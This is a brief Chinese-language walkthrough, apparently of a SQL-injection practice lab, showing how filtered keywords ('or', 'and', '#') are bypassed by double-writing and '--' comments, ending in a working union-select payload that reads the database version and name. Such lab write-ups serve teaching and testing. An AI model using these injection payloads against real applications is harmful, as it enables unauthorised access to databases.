知识点:
- or and # 被过滤了
- 有回显可以用联合注入
- 这里可以利用双写绕过(亲测有效,)
- oorr
- anandd
- 这样的话可以使用错误注入(不演示了,有兴趣可以试一下)
又是一个id输入
测试是什么类型的注入
构造payload:id=1
构造payload:id=1/0
构造payload:id=1'
构造payload:id=1''
发现界面是有输出的,同时界面提示了or and等关键字应该是要过滤的,并且下面给出了过滤后的信息;经过不断的测试发现,这是一个字符型注入
构造payload:id=1'+or+1=1#
发现报错了,果然or and 关键字被过滤了
使用联合注入试一下
构造payload:id=0'+union+select+1,2,3#
发现界面错误,看下面的提示发现#被过滤了;其实上面测试的时候就发现了,这里就是按照一般思路测试一下,在不知道什么过滤的条件下需要一步步测试;根据提示发现一直提示单引号问题就能猜出#注释没有发挥作用
构造payload:id=0'+union+select+1,2,3+--+
成功显示了内容
接下来获取数据库名和版本信息
构造payload:id=0'+union+select+1,version(),database()+--+
成功获取了数据库名和版本信息,这里就结束了,收工
10
